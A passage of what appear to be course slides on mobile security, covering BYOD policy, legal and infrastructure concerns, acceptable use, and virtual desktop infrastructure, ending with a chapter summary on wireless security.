Monitoring programs should be enhanced to include monitoring and control of mobile devices.
BYOD (9 of 12)
BYOD user acceptance
BYOD inherently creates a conflict between personal and corporate interests.
Corporate BYOD policy needs to be well defined, approved by the corporate legal department, and clearly communicated to all employees through training.
BYOD (10 of 12)
Architecture/infrastructure considerations
Mobile devices consume connections to your corporate IT infrastructure.
It is recommended that load testing be performed to ensure that your design or existing infrastructure can support the potentially large number of connections from multiple devices.
Multiple connections can also create security issues when the system tracks user accounts against multiple connections.
BYOD (11 of 12)
Legal concerns
Many security challenges are presented by mobile devices used for corporate business.
Make sure you have solid legal review of policies.
Policies and procedures should be reviewed on a regular basis to stay current with technology.
One challenge is the possibility that mobile devices will be used for illegal purposes.
BYOD (12 of 12)
Acceptable use policy
An acceptable use policy should address authorized usage of corporate devices for personal purposes.
Disciplinary actions for violation should be defined.
VDI (1 of 2)
In the case of laptops, a virtual desktop infrastructure (VDI) solution can bring control to the mobile environment associated with non-corporate-owned equipment.
The enterprise can set up virtual desktop machines that are:
Fully security compliant
Equipped with all the applications needed by the employee
Accessible to the employee via either a virtual connection or a remote desktop connection
VDI (2 of 2)
VDI can solve most, if not all, of the security and application functionality questions associated with mobile devices.
It does require an IT organization capable of setting up, maintaining, and managing the VDI in the enterprise:
Not necessarily a small task
Scaled by the number of instances needed
Chapter Summary
Describe the different wireless systems in use today.
Detail WAP and its security implications.
Identify 802.11’s security issues and possible solutions.
Learn about the different types of wireless attacks.
Examine the elements needed for enterprise wireless deployment.
Examine the security of mobile systems.